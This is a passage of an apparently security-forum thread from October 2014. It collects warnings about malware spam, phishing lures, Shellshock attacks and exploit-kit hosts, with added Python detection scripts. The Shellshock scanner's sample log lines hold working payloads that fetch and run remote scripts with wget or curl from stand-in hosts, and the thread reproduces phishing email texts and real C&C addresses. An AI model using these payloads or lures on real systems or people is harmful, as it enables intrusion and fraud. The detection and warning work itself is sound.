3 Oct 2014 - "'Re: Personal reply id 509359' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Office_macro.png
3 October 2014: Reply02.doc . Current Virus total detections: 4/55*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en/file/75fda9cc7d62d11e88ddfae10b094af5a46b87a838bbe45954cdb3c27d098b73/analysis/1412314059/
___
Fake 'Adobe invoice' SPAM...
- http://blog.mxlab.eu/2014/10/02/malicious-adobe-invoice-doc-attached-to-fake-emails-adobe-creative-cloud-service-invoice/
Oct 2, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Adobe Invoice”. This email is sent from the spoofed address “Adobe Billing <billing@ adobe .com>” and has the following body:
Dear Customer,
Thank you for signing up for Adobe Creative Cloud Service.
Attached is your copy of the invoice.
Thank you for your purchase.
Thank you,
The Adobe Team
Adobe Creative Cloud Service
Screenshot: http://img.blog.mxlab.eu/2014/20141002_adobe.gif
The attached file is 42 kB large and has the name Adobe Invoice.doc. The trojan is known as W97M.Dropper.F, VBA/TrojanDownloader.Agent.AZ, MSOffice/Agent!tr or Win32.Trojan.Macro.Dxmz. At the time of writing, 4 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/55f06751b22dd5c17bcce7ab9e9da59dcabd3840ab089fe8b800c8aebbf1f3f5/analysis/
___
Shellshock in-the-wild - drops malware
- http://community.websense.com/blogs/securitylabs/archive/2014/10/01/malware-in-the-wild-abusing-shellshock-vulnerability.aspx
1 Oct 2014 - "Since the Shellshock vulnerability became public knowledge... vulnerability being exploited in the wild to drop malware...
Backdoors and Bot Nets: The observed malware found to be exploiting the Shellshock vulnerability has been dropped by various command and control (C&C) servers... The malware has the following capabilities:
- A Linux backdoor, capable of DDoS attacks, brute force attacks on passwords, and receiving commands to execute from its C&C server.
- A Perl IRC bot, typically capable of DDoS attacks and spreading itself by looking for exploitable servers using various vulnerabilities, such as remote file inclusion exploits.
The malware has been seen to be downloaded to a compromised machine by exploiting the Shellshock vulnerability and invoking commands such as "curl" or "wget," and then executing the malicious payload. To date, we have seen -4- variants of the Linux backdoor and several versions of the Perl-based IRC bot.
Popularity Since Vulnerability Disclosure: The following domains and IPs have been found to be used as command & control (C&C) points for this campaign (amongst others):
208.118.61.44: https://www.virustotal.com/en/ip-address/208.118.61.44/information/
27.19.159.224: https://www.virustotal.com/en/ip-address/27.19.159.224/information/
89.238.150.154: https://www.virustotal.com/en/ip-address/89.238.150.154/information/
212.227.251.139: https://www.virustotal.com/en/ip-address/212.227.251.139/information/
... We have seen C&C traffic to these IPs in the last 2 -months- showing that they have been used for malicious and bot network campaigns -prior- to the Shellshock vulnerability disclosure. In fact, going back as far as 2012, we see that one such C&C was used in a Point-of-Sale malware campaign known as 'vSkimmer'. More recently, we have observed it serving up an IRC bot... Experience has taught us that as cyber-criminals zoom in on the vulnerable code branch, -additional- vulnerabilities are likely to surface..."
- http://atlas.arbor.net/briefs/index#1914014714
Extreme Severity
3 Oct 2014
:fear::fear: :mad:
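The Websense item above describes the in-the-wild pattern for the bash CVEs listed earlier in this thread (CVE-2014-6271, -6277, -6278, -7169, -7186, -7187): a function-definition string in an HTTP header reaching a CGI environment variable, followed by a curl or wget fetch of a backdoor or Perl IRC bot. The script below is an added example, not code from Websense, SecurityTracker or anyone else quoted here. It walks Apache combined-format access log lines, percent-decodes each field once, flags any "() {" shaped value wherever it sits (request line, Referer or User-Agent) rather than only the exact CVE-2014-6271 string, and pulls out the staging URLs so they can be blocked. The log lines are constructed (RFC 5737 documentation addresses); the field layout and the regexes are assumptions.

```python
"""Spot Shellshock probes in web-server logs and pull out the staging URLs.

Added example, not code from Websense, SecurityTracker or any other source
quoted in this thread. The log lines are constructed (RFC 5737 documentation
addresses); the field layout assumed is Apache's 'combined' format.
"""
import re
from urllib.parse import unquote

# Any '() {' shaped value is a function-definition probe, whatever sits inside
# the braces: CVE-2014-6271 payloads use '() { :;};', CVE-2014-6278 payloads
# use '() { _; } >_[$($())] { ... }', and attackers vary the whitespace.
FUNC_DEF = re.compile(r"\(\s*\)\s*\{")
# Download-and-run staging typical of the observed droppers (wget/curl + URL).
STAGER = re.compile(r"\b(wget|curl)\b[^;|&]*?(https?://[^\s\"'<>;|&)]+)", re.I)
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def analyse_line(line):
    """Return a finding dict for a Shellshock-shaped request, else None."""
    m = COMBINED.match(line)
    if not m:
        return None
    # Decode %xx once so '%28%29%20%7B' is seen as '() {'. The decoded text is
    # only ever matched with regexes, never handed to a shell (the Yahoo
    # incident in this thread was a log-parsing script with its own injection
    # bug). Double-encoded payloads would need a second unquote pass.
    fields = {k: unquote(v) for k, v in m.groupdict().items()}
    hit = [k for k in ("req", "ref", "ua") if FUNC_DEF.search(fields[k])]
    if not hit:
        return None
    payload = " ".join(fields[k] for k in hit)
    stagers = [(tool.lower(), url) for tool, url in STAGER.findall(payload)]
    return {"src": fields["ip"], "fields": hit, "stagers": stagers,
            "status": int(fields["status"])}


def scan_log(lines):
    """All findings, in log order. A 404 only means that path was not a CGI;
    the same source usually walks a list of paths until one answers."""
    return [f for f in map(analyse_line, lines) if f]


def staging_urls(lines):
    """Distinct download URLs seen in probes, ready for a blocklist."""
    return sorted({url for f in scan_log(lines) for _, url in f["stagers"]})


# Constructed sample log; addresses are from the RFC 5737 documentation ranges.
SAMPLE_LOG = [
    # classic CVE-2014-6271 payload in the User-Agent, staging a Perl bot
    '198.51.100.7 - - [01/Oct/2014:03:14:07 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/bash -c \'wget http://203.0.113.9/bot.pl -O /tmp/x; perl /tmp/x\'"',
    # CVE-2014-6278 shape carried in the Referer, curl fetch, path was not a CGI
    '198.51.100.8 - - [01/Oct/2014:03:15:22 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 '
    '"() { _; } >_[$($())] { curl -s http://203.0.113.9/x.sh -o /tmp/.x; }" "Mozilla/5.0"',
    # percent-encoded payload in the request line itself
    '198.51.100.9 - - [01/Oct/2014:03:16:01 +0000] "GET /cgi-bin/a?x=%28%29%20%7B%20%3A%3B%7D%3B'
    '%20curl%20http://203.0.113.10/m%7Csh HTTP/1.1" 500 0 "-" "curl/7.37.0"',
    # ordinary browser request; parentheses in the UA must not trigger
    '192.0.2.33 - - [01/Oct/2014:03:16:30 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["src"], f["status"], f["fields"], f["stagers"])
    print("block:", staging_urls(SAMPLE_LOG))
```

Matching on the "() {" shape instead of the full exploit string is deliberate: Yahoo's account above is of attackers mutating the payload to slip past IDS and WAF signatures, and the Websense piece notes the same C&C infrastructure predates the disclosure, so the URLs this pulls out are worth checking against existing block lists as well as adding to them.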
AplusWebMaster
2014-10-06, 15:15
FYI...
Fake Western Union invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/western-union-invoice-5751107-october-fake-pdf-malware/
6 Oct 2014 - "'invoice 5751107 October' pretending to come from Western Union Inc and quite a few others coming from a random single name like Amelia, Fred, John etc at random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 8017730 Account No 5608017730.
Thanks very much
Western Union Inc. 2014 @ All rights reserved.
The earlier email looks like:
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 5751107 Account No 5605751107.
Thanks very much
Amelia ...
6 October 2014: invoice_5751107.zip: Extracts to: invoice.0914.1602783433405300232.exe
Current Virus total detections: 9/55* . This invoice 5751107 October pretending to come from Western Union is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ce97ddc450b4aefc33e279992c2a201297d74eb56ff98f8ed188fa2c0990485b/analysis/1412589518/
___
Fake Bank confirmation SPAM - PDF malware
- http://myonlinesecurity.co.uk/chen-young-bank-swift-fake-pdf-malware/
6 Oct 2014 - "'CHEN YOUNG BANK SWIFT' pretending to come from CHEN YOUNG is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Hello,
My bank have made the payment and the funds will arrive your bank in 3 days time. Attached is the bank confirmation Swift, let me know if your bank details are ok in the SWIFT
Thank you!
Chen Young
Branch Manager
YangZhou Wells Imp&Exp Co., Ltd
9-525 Modern Square,
Wenhui West Road
Yangzhou, Jiangsu. CHINA
Fax: 0086 514 8795 1721 / 0086 514 8795 1752
6 October 2014: SWIFT_0000019989399188321110000011.zip:
Extracts to: SWIFT_000001998939918835961163324799.exe
Current Virus total detections: 9/55* . This 'CHEN YOUNG BANK SWIFT' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ff424a01fd1a1f3fd0bb50704d16cd8fe63f7d4136b2df4bf6b8924bace8c979/analysis/1412582411/
___
Fake Tiffany invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/tiffany-invoice-copy-waiting-confirmation-fake-pdf-malware/
6 Oct 2014 - "'invoice copy (waiting for your confirmation)' pretending to come from Tiffany & Co. <j.parker@ tiffany .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Kindly open to see export License and payment invoice attached, meanwhile we sent the balance payment yesterday.
Please confirm if it has settled in your account or you can call if there is any problem.
Thanks J.parker
Tiffany & Co.
6 October 2014: Tiffany order details 06-10-2014.zip:
Extracts to: Tiffany order details 06-10-2014.exe
Current Virus total detections: 6/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f1b13062f764e0e5643da3e74753d912d596cc362def9142263cea0e686bba80/analysis/1412597423/
:fear: :mad:
AplusWebMaster
2014-10-07, 15:35
FYI...
DHL phish ...
- http://blog.dynamoo.com/2014/10/dhl-themed-phish-goes-to-lot-of-effort.html
7 Oct 2014 - "This DHL-themed phish is trying to harvest email credentials, but instead of just spamming out a link, it spams out a PDF file with the link embedded in it.
Screenshot: https://3.bp.blogspot.com/-J8JkllU3g1M/VDOdr9sAc5I/AAAAAAAAFyQ/VE4P9MxOkGY/s1600/dhl.png
Look closely at the blurb at the bottom and it confuses DHL with UPS, but who reads that? Attached is a non-malicious PDF file DHL (1).pdf which contains a link to the phishing site.
Screenshot2: https://2.bp.blogspot.com/-smrDiPpKzJY/VDOeWRTX8uI/AAAAAAAAFyY/oucaylYyHdQ/s1600/dhl2.png
... a neat trick to use PDF files in this way as a lot of spam filters and anti-phishing tools won't spot it. The link in the PDF goes to 37.61.235.199 /~zantest/doc1/dhlweb0002/webshipping_dhl_com_members_modulekey_displaycountrylist_id5482210003804452/DHL/index .htm where it has a rather less professional looking webpage that is phishing for general email addresses rather than DHL credentials.
Screenshot3: https://4.bp.blogspot.com/-BDpUiMlKaEk/VDOfv4G-CmI/AAAAAAAAFyk/sS4m_BsPR1I/s1600/dhl3.png
With the grotty graphics and injudicious use of Comic Sans, it's hard to see how this would fool anyone into turning over their credentials.. but presumably they manage to harvest enough usernames and passwords to make it worthwhile."
37.61.235.199: https://www.virustotal.com/en/ip-address/37.61.235.199/information/
___
Fake Outlook voice mail SPAM – wav malware
- http://myonlinesecurity.co.uk/microsoft-outlook-received-voice-mail-fake-wav-malware/
7 Oct 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook <no-reply@ random domain address > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE0003589463733.wav
Caller-Id: 3589463733
Message-Id: ZU1I9W
Email-Id: montag @ myonlinesecurity .co .uk
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server
7 October 2014: VOICE3589463733.wav.zip: Extracts to: VOICE000358276655116307.exe
Current Virus total detections: 10/55* . This You have received a voice mail is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound ) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected...*
* https://www.virustotal.com/en/file/fb286c8c0c1bbf7c89be27016a7fce614515fa47e1e5219618b15ead6d0cf544/analysis/1412673429/
___
Vishing ...
- https://blog.malwarebytes.org/fraud-scam/2014/10/here-vishy-vishy/
Oct 7, 2014 - "Voice phishing – Vishing, for short – has been around for a long time and is all about using the phone and social engineering to grab the information required...
Ref: http://www.edinburghnews.scotsman.com/news/crime/vishing-scammers-con-woman-out-of-80-000-1-3540027
...
- http://www.telegraph.co.uk/finance/personalfinance/bank-accounts/10882193/I-lost-17500-in-vishing-scam-because-I-didnt-watch-The-One-Show.html
Vishing can start with an email or a text but the ultimate goal is to get you on the other end of a telephone line. From there, the -scammers- will go about harvesting your data by pretending to be your bank and asking for card... It’s important to remember there are many more ways to fall foul of a telephone scam than “just” Vishing, and you can take a look at some more examples in a roundup by the FTC*..."
* http://www.consumer.ftc.gov/articles/0076-phone-scams
___
419 SCAM - Breast Cancer Awareness Donation
- http://myonlinesecurity.co.uk/ongoing-breast-cancer-awareness-donation-program-419-scam/
7 Oct 2014 - "This rather evil and nasty 419 scam saying Ongoing Breast Cancer Awareness Donation Program pretends to come from Neil trotter Cancer Foundation <neil–trotter@ [redacted] .com>... The email looks like this with pictures:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Ongoing-Breast-Cancer-Awareness-Donation-Program.png
Obviously it is a total -scam- and you should -not- reply to any email received that is like this."
___
Fake inTuit/Apple malicious SPAM
- https://security.intuit.com/alert.php?a=111
Oct 7, 2014 - "People are receiving fake emails with the title 'Your receipt No.557911643385'. These mails are coming from applecenter@ security .intuit .com, which is -not- a legitimate email address (spoofed). Below is a copy of the email people are receiving:
Apple iTunes
October 07, 2014
Billed To:
Order ID: KT85GMQ55L
Receipt Date: 10/07/2014
Order Total: $161.98
Billed To: Store Credit
Item Artist
August: Osage County John Wells
My Man Is a Loser Mike Young
Type Unit Price
Film Rental(HD) $67.99
Film Rental(HD) $93.99
Order Total
$161.98
Issues with this transaction?
If you haven't authorized this transaction, click the link below to get full refund...
2014 Apple Online Support
This is the end of the -fake- email.
Steps to Take Now:
- Do not open the attachment in the email.
- Do not -click- on any -links- in the email..
- Delete the email.
___
Yahoo Sports servers - malicious code
- http://www.theinquirer.net/inquirer/news/2374191/yahoo-shellshock-not-to-blame-for-server-security-flaw
Oct 7 2014 - "... there was some kind of security breach on its servers, but took pains to clear up reports which suggested that Shellshock was the reason. Yahoo's chief information security officer, Alex Stamos, took to the net to counter comments that began at Yahoo*..."
* https://news.ycombinator.com/item?id=8418809
Oct 6 2014 - "... I’m the CISO of Yahoo and I wanted to clear up some misconceptions. Earlier today, we reported that we isolated a handful of servers that were detected to have been impacted by a security flaw. After investigating the situation fully, it turns out that the servers were in fact -not- affected by Shellshock. Three of our Sports API servers had malicious code executed on them this weekend by attackers looking for vulnerable Shellshock servers. These attackers had mutated their exploit, likely with the goal of bypassing IDS/IDP or WAF filters. This mutation happened to exactly fit a command injection bug in a monitoring script our Sports team was using at that moment to parse and debug their web logs. Regardless of the cause our course of action remained the same: to isolate the servers at risk and protect our users' data. The affected API servers are used to provide live game streaming data to our Sports front-end and do not store user data. At this time we have found -no- evidence that the attackers compromised any other machines or that any user data was affected. This flaw was specific to a small number of machines and has been -fixed- and we have added this pattern to our CI/CD code scanners to catch future issues... the servers in question had been successfully patched (twice!!) immediately after the Bash issue became public. Once we ensured that the impacted servers were isolated from the network, we conducted a comprehensive trace of the attack code through our entire stack which revealed the root cause: -not- Shellshock... just because exploit code works doesn’t mean it triggered the bug you expected!... Yahoo takes external security reports seriously and we strive to respond immediately to credible tips... our records show no attempt by this researcher to contact us using those means. Within an hour of our CEO being emailed directly we had isolated these systems and begun our investigation..."
___
Adobe - spying on e-book readers
- http://www.theinquirer.net/inquirer/news/2374349/adobe-accused-of-spying-on-e-book-readers
Oct 7 2014
- http://arstechnica.com/security/2014/10/adobes-e-book-reader-sends-your-reading-logs-back-to-adobe-in-plain-text/
Oct 7 2014
- http://the-digital-reader.com/2014/10/06/adobe-spying-users-collecting-data-ebook-libraries/
:mad: :fear:
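The DHL phish above carries its link inside an otherwise clean PDF precisely because many mail filters only look at links in the message body. The extractor below is an added example, not code from dynamoo.com or any other source quoted in this thread. It pulls every /URI action out of a PDF, including ones packed inside FlateDecode streams where a plain grep of the file would not see them, lists the active-content markers (/JavaScript, /Launch, /OpenAction and so on) that would make the file more than a passive lure, and sorts each link into "ip-literal-host", "brand-domain" or "off-brand-host" against the brand the lure claims. The two PDFs are constructed by hand (minimal, no xref table, not valid for a viewer) purely to exercise the extractor, and the IP-literal link uses an RFC 5737 documentation address rather than the phishing host from the post.

```python
"""Pull link targets and active-content markers out of a PDF attachment.

Added example, not code from dynamoo.com or any other source quoted in this
thread. The PDFs built below are minimal constructions (no xref table, not
viewer-valid) that exist only to exercise the extractor; the IP-literal link
uses an RFC 5737 documentation address, not the real phishing host.
"""
import re
import zlib
from ipaddress import ip_address
from urllib.parse import urlparse

URI_LITERAL = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)")    # /URI (http://...)
URI_HEX = re.compile(rb"/URI\s*<([0-9A-Fa-f\s]+)>")            # /URI <687474703a...>
FLATE_STREAM = re.compile(rb"/FlateDecode.*?stream\r?\n(.*?)\r?\nendstream", re.S)
ACTIVE = {
    "JavaScript": rb"/JavaScript\b", "JS": rb"/JS\b", "Launch": rb"/Launch\b",
    "OpenAction": rb"/OpenAction\b", "AA": rb"/AA\b", "SubmitForm": rb"/SubmitForm\b",
}


def _unescape(lit):
    # PDF literal strings escape '(' ')' and '\' with a backslash; octal
    # escapes are not handled here (simplification of the spec).
    return re.sub(rb"\\(.)", rb"\1", lit).decode("latin-1")


def _views(pdf):
    """Yield the raw bytes plus the inflated body of every FlateDecode stream."""
    yield pdf
    for m in FLATE_STREAM.finditer(pdf):
        try:
            yield zlib.decompress(m.group(1))
        except zlib.error:
            continue   # damaged, or not actually deflate data; skip it


def extract_uris(pdf):
    """Every /URI target found in the file, literal or hex encoded, de-duplicated."""
    uris = set()
    for view in _views(pdf):
        uris.update(_unescape(m.group(1)) for m in URI_LITERAL.finditer(view))
        for m in URI_HEX.finditer(view):
            hexdigits = re.sub(rb"\s", b"", m.group(1)).decode()
            uris.add(bytes.fromhex(hexdigits).decode("latin-1"))
    return sorted(uris)


def active_content(pdf):
    """Names of active-content features present anywhere in the file."""
    return sorted(name for name, pat in ACTIVE.items()
                  if any(re.search(pat, view) for view in _views(pdf)))


def triage_links(pdf, expected_domain):
    """Classify each link by whether its host plausibly belongs to the brand in the lure."""
    verdicts = {}
    for uri in extract_uris(pdf):
        host = (urlparse(uri).hostname or "").lower()
        try:
            ip_address(host)
            verdicts[uri] = "ip-literal-host"     # no real courier links to a bare IP
            continue
        except ValueError:
            pass
        if host == expected_domain or host.endswith("." + expected_domain):
            verdicts[uri] = "brand-domain"
        else:
            verdicts[uri] = "off-brand-host"
    return verdicts


def build_sample_pdf(uri, compressed=False):
    """Constructed one-page PDF with a single link annotation (no xref table)."""
    annot = (b"<< /Type /Annot /Subtype /Link /Rect [72 700 300 720] "
             b"/A << /S /URI /URI (" + uri.encode() + b") >> >>")
    if compressed:
        # Put the annotation inside an object stream, as PDF 1.5+ writers do.
        body = zlib.compress(b"4 0 obj " + annot + b" endobj")
        obj4 = (b"5 0 obj << /Type /ObjStm /Filter /FlateDecode /Length "
                + str(len(body)).encode() + b" >>\nstream\n" + body
                + b"\nendstream\nendobj\n")
    else:
        obj4 = b"4 0 obj " + annot + b" endobj\n"
    return (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
            b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] "
            b"/Annots [4 0 R] >> endobj\n"
            + obj4 + b"trailer << /Root 1 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    lure = build_sample_pdf("http://203.0.113.5/~zantest/doc1/DHL/index.htm")
    print(triage_links(lure, "dhl.com"), active_content(lure))
```

Regex scanning is a triage step, not a parser: a production check would use a real PDF library so that object streams, cross-reference streams and other filters are handled, but the point here is that the link has to be read out of the attachment before any URL reputation check can apply to it.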
AplusWebMaster
2014-10-08, 14:45
FYI...
Fake Business proposal - Phish ...
- https://blog.malwarebytes.org/fraud-scam/2014/10/dear-important-business-proposal/
Oct 8, 2014 - "Carter Ham, a retired four-star United States Army general, is supposedly on Linkedin—and he wants you (to read his personal message)... clearly a scheme to phish for information from unwary recipients. Below is a screenshot of the sender’s online profile:
General Carter Ham on Linkedin. Not!:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/linkedin-gch.png
... As far as the legitimacy of the profile goes, the blurb from the Summary section was copied and pasted from this Wikipedia page*. We don’t know if the former general is indeed on the said social networking site (in case you’re wondering). What we -do- know is that if you receive a message similar to the one above asking for personal information from you in exchange for a slice of the cash s/he wanted to move, it’s best to ignore the message and check with this contact if his/her account has been hacked or not."
* http://en.wikipedia.org/wiki/Carter_Ham
___
Fake Lloyds and NatWest SPAM - malware
- http://blog.dynamoo.com/2014/10/malware-spam-lloyds-important.html
8 Oct 2014 - "... familiar pattern to this malware-laden spam, but with an updated payload from before:
Lloyds Commercial Bank: "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 8 October 2014 11:09
Subject: Important - Commercial Documents
Important account documents
Reference: C437
Case number: 66324010
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...
From: NatWest [secure.message@ natwest .com]
Date: 8 October 2014 10:29
Subject: You have a new Secure Message - file-2620
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
Please download your ecnrypted message at ...
(Google Disk Drive is a file hosting service operated by Google, Inc.) ...
The link in the email runs through a script which will attempt to download a ZIP file pdf-to-view_864129_pdf.zip onto the target machine which in turn contains a malicious executable pdf-to-view_864129_pdf.exe which has a VirusTotal detection rate of 6/53*. The Malwr report indicates that the malware phones home to the following locations which are worth -blocking- especially 94.75.233.13 (Leaseweb, Netherlands) which looks like a C&C server."
94.75.233.13 :37400/0810uk1/HOME/0/51-SP3/0/
94.75.233.13 :37400/0810uk1/HOME/1/0/0/
94.75.233.13 :37400/0810uk1/HOME/41/5/1/
cemotrans .com/seo/0810uk1.soa
* https://www.virustotal.com/en/file/3c04500e3adf84f62f6428f5d739d5f877e81071bcdfff9d186f120533ffe0df/analysis/1412773720/
... Behavioural information
DNS requests
cemotrans .com (82.98.157.8)
TCP connections
94.75.233.13: https://www.virustotal.com/en/ip-address/94.75.233.13/information/
82.98.157.8: https://www.virustotal.com/en/ip-address/82.98.157.8/information/
___
Fake photo SPAM – malware
- http://myonlinesecurity.co.uk/photo-8-oct-2014-malware/
8 Oct 2014 - "'photo 8 oct 2014' pretending to come from various @yahoo.co.uk addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email is very plain and terse with the subject of photo 8 oct 2014 and the body simply says:
Sent from my iPhone
8 October 2014: Img-0034.zip: Extracts to: Img-0034.jpeg
Current Virus total detections: 2/54*. Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en/file/272804c706382e8a994bce09d36f0d620ba97dde68c2b590f26d442f984ce773/analysis/1412768396/
___
Fake Invoice Balance SPAM - word doc malware
- http://myonlinesecurity.co.uk/invoice-balance-fake-word-doc-malware/
8 Oct 2014 - "'Invoice Balance' pretending to come from various Hotmail .co.uk addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
HELLO,
work-life balance.
Thanks
---
8 October 2014: Invoice_Balance_september_doc.zip: Extracts to: Invoice_Balance_september_doc.exe
Current Virus total detections: 2/53*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/272804c706382e8a994bce09d36f0d620ba97dde68c2b590f26d442f984ce773/analysis/1412766448/
___
Australian Taxation Office Refund Spam
- http://threattrack.tumblr.com/post/99483080723/australian-taxation-office-refund-spam
Oct 8, 2014 - "Subjects Seen:
Australian Taxation Office - Refund Notification
Typical e-mail details:
IMPORTANT NOTIFICATION
Australian Taxation Office - 08/10/2014
After the last calculation of your fiscal activity we have determined that you are eligible to receive a refund of 2398.43 AUD.
For more details please follow the steps bellow :
- Right-click the link on the attachment name, and select Save Link As, Save Target As or a similar option provided.
- Select the location into which you want to download the file and choose Save.
- Unzip the attached file.
Ingrid Warren,
Tax Refund Department
Australian Taxation Office
Malicious File Name and MD5:
ATO_TAX_419771083.zip (EBE4991F3C1C4B00E3E8662577139F3E)
ATO_TAX_419771083.pdf.scr (A89CD5ACAB413D308A565B21B481A2F8)
Tagged: australian taxation office, Upatre, ATO
:fear: :mad:
AplusWebMaster
2014-10-09, 13:18
FYI...
Nuclear EK active on 178.79.182.106
- http://blog.dynamoo.com/2014/10/nuclear-ek-active-on-17879182106.html
9 Oct 2014 - "It looks like the Nuclear exploit kit is active on 178.79.182.106 (Linode, UK), using hijacked subdomains of legitimate domains using AFRAID.ORG nameservers. I can see the following sites active on that IP:
fuhloizle .tryzub-it .co.uk
fuhloizle .pgaof39 .com
fuhloizle .cusssa .org
"fuhloizle" is a pretty distinctive search string to look for in your logs. It looks like the bad sites might be down at the moment (or the kit is hardened against analysis), but blocking this IP address as a precaution might be a good idea."
178.79.182.106: https://www.virustotal.com/en/ip-address/178.79.182.106/information/
___
chinaregistry .org.cn domain SCAM
- http://blog.dynamoo.com/2014/10/chinaregistryorgcn-domain-scam.html
9 Oct 2014 - "This is an old scam that can safely be ignored.
From: Henry Liu [henry.liu@ chinaregistry .org.cn]
Date: 9 October 2014 07:53
Subject: [redacted] domain and keyword in CN
(Please forward this to your CEO, because this is urgent. Thanks)
We are a Network Service Company which is the domain name registration center in Shanghai, China. On Oct 7, 2014, we received an application from Huaya Holdings Ltd requested "[redacted]" as their internet keyword and China (CN) domain names. But after checking it, we find this name conflict with your company name or trademark. In order to deal with this matter better, it's necessary to send email to you and confirm whether this company is your distributor or business partner in China?
Kind regards
Henry Liu
General Manager
China Registry (Headquarters)
3002, Nanhai Building, No. 854 Nandan Road,
Xuhui District, Shanghai, China ...
Nobody is trying to register your domain name, this is simply a long-running scam aimed at getting you to spend too much money on something that you don't need. And I strongly recommend that you don't forward junk email like this to your CEO either..."
(Short video at the dynamoo URL above.)
___
Bash Bug saga continues: Shellshock Exploit via DHCP
- http://blog.trendmicro.com/trendlabs-security-intelligence/bash-bug-saga-continues-shellshock-exploit-via-dhcp/
Oct 8, 2014 - "The Bash vulnerability known as Shellshock can be exploited via several attack surfaces including web applications, DHCP, SIP, and SMTP. With multiple proofs of concept (including -Metasploit- code) available in the public domain, this vulnerability is being heavily exploited. Most discussion of Shellshock attacks has focused on attacks on web apps. There has been relatively little discussion on other surfaces like DHCP, SMTP, and CUPS... techniques could be used by an attacker to compromise more machines within the network. Dynamic Host Configuration Protocol (DHCP) is a protocol used to dynamically distribute and assign network configuration settings, such as IP addresses. An attacker can configure a compromised DHCP server or create a rogue DHCP server to send -malicious- information to the DHCP client. Either technique means that the attacker has already compromised the network using other attack vectors... Various techniques can be used to exploit Shellshock over DHCP..."
(More detail at the trendmicro URL above.)
:mad: :fear:
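The Nuclear EK post above suggests searching logs for the distinctive "fuhloizle" label and blocking 178.79.182.106. As an added example (not from the dynamoo post), this script runs that check over constructed Squid-style proxy log lines, matching the label as a whole DNS label, the listed hostnames, direct access to the IP, and any hostname the proxy resolved to that IP; the log format regex and all sample lines are assumptions.

```python
import ipaddress
import re
from dataclasses import dataclass

# Indicators quoted in the Nuclear EK write-up above (dynamoo, 9 Oct 2014).
NUCLEAR_EK_IP = ipaddress.ip_address("178.79.182.106")
NUCLEAR_EK_LABEL = "fuhloizle"
NUCLEAR_EK_HOSTS = {
    "fuhloizle.tryzub-it.co.uk",
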